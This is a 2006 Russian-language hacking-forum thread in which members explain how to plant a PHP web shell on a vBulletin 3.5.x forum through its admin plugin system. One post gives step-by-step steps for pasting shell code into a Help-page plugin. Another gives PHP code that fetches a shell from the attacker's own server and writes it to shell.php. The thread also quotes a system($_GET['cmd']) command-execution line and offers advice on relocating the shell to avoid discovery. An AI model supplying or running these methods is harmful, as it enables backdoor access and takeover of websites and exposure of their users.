Форумы Шелл vBulletin 3.5.3

Discussion in 'Уязвимости CMS/форумов' started by bandera, 17 Jul 2006.

  1. bandera

    bandera Banned

    Joined:
    2 Jun 2006
    Messages:
    58
    Likes Received:
    37
    Reputations:
    11
    В поиске был, так ничего и не нашёл. -)
    Имею доступ к админке, можно ли всётаки как нибудь залить шелл?
     
  2. Enk0r

    Enk0r Elder - Старейшина

    Joined:
    23 Jun 2006
    Messages:
    61
    Likes Received:
    58
    Reputations:
    32
    Наверное никак...
     
  3. Geniy

    Geniy New Member

    Joined:
    19 Apr 2006
    Messages:
    14
    Likes Received:
    4
    Reputations:
    0
    Хватит дезинформировать народ.. Залить можно через модули.. Видео скора сниму...
     
  4. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Не знаю можно ли это на 3.5.3. Но попробуй пройтись по одной из ссылок внизу топика. ShAnKaR описывал.
     
  5. bandera

    bandera Banned

    Joined:
    2 Jun 2006
    Messages:
    58
    Likes Received:
    37
    Reputations:
    11
    Можно объяснить по подробней, а то пока видео дождёшься...
     
  6. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    А ты через смайлы пробовал , у меня тожа один раз такая проблемка вышла , я даже сам не поверл когда залил шелл через смайлики.
     
  7. WEB'er

    WEB'er Member

    Joined:
    26 Jun 2006
    Messages:
    15
    Likes Received:
    5
    Reputations:
    0
    А нужно именно залить? Там же вроде в шалоны можно Php-код вставлять .... Или нет?=) Заинклудь шелл со своего хоста а там разбирёшься=)
     
  8. Geniy

    Geniy New Member

    Joined:
    19 Apr 2006
    Messages:
    14
    Likes Received:
    4
    Reputations:
    0
    Ладно - обойдёмся без видео:
    Берешь шелл не больше 60кб,
    Адмминка-Система модулей- добавить новый модуль.
    Продукт Vbulletin
    Месторасположение: Vbulletin: Справка - faq_complete
    В тело вставляешь код шелла предварительно убрав в начале <? и в конце ?>
    Затем прост о заходишь в справку из форума и любуешся своим шеллом.

    Советую сразу перезалить шелл в другое место - а этот удалить - мало-ли кому взбредёт справку глянуть :)
     
    2 people like this.
  9. WEB'er

    WEB'er Member

    Joined:
    26 Jun 2006
    Messages:
    15
    Likes Received:
    5
    Reputations:
    0
    Geniy
    на 3.5.4 у меня не пашет=(

    2 ALL
    вот мой немного дебильный способ=)

    Заливаем куда-нить с себе на хост шелл под именем - "shell.txt"

    Создаём новый модуль. Местоположение хака - "Calendar_start"
    Даём ему какое-нить неприметное имя=)
    И пишем код:
    Code:
    $file = fopen("http://ВАШ_СЕРВЕР.ru/shell.txt", "r");
    $fp = fopen('shell.php', 'a');
    while ($line = fgets($file, 4096) )
    {  
    $line.="\n";  
    fwrite($fp, ''.$line.'');
    }
    fclose($fp);
    fclose($file);
    
    теперь идём по ссылке - _http://servak.com/forum/shell.php - вот он наш шелл.

    Проверял всё это дело на локалхосте - работает. Работоспособность будет зависеть от настроек апача, или что там у вас стоит=). Конечно способ идиотский, но у меня на локалхосте больше ничего не срабатывало=( : ни инклудинг, ни "system($id);", ни через смайлы ... ТОлько вот этот способ=)
     
    2 people like this.
  10. Brahma

    Brahma Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    55
    Likes Received:
    13
    Reputations:
    6
    Видимо обычный system($_GET["cmd"]); ужэ не рулёз )
     
  11. Geniy

    Geniy New Member

    Joined:
    19 Apr 2006
    Messages:
    14
    Likes Received:
    4
    Reputations:
    0
    Мой способ прекрасно работает на 3.5.4. Видно у тя шелл больше 60 кб.
     
    1 person likes this.
  12. bandera

    bandera Banned

    Joined:
    2 Jun 2006
    Messages:
    58
    Likes Received:
    37
    Reputations:
    11
    Благадорю.